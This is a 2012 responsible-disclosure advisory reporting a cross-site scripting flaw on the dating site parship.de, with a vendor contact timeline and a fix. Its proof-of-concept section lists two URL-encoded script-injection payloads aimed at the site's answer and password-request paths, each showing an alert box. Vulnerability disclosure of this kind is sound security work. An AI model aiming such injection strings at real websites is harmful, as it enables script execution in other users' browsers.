Advisory:		www.parship.de - Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2012-026
Author:			Stefan Schurtz
Affected Software:	Successfully tested on www.parship.de
Vendor URL:		http://www.parship.de
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

http://www.parship.de is prone to a XSS vulnerability

==========================
PoC-Exploit
==========================

POST: http://www.parship.de/potw/answer%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E
POST: http://www.parship.de/login/sendpassword/requestpassword%22%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(/huh/)%3C/script%3E

==========================
Solution
==========================

fixed

==========================
Disclosure Timeline
==========================

23-Dec-2012 - informed by contact form
24-Dec-2012 - feedback from vendor
05-Feb-2013 - feedback and fix from vendor

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.darksecurity.de/advisories/2012/SSCHADV2012-026.txt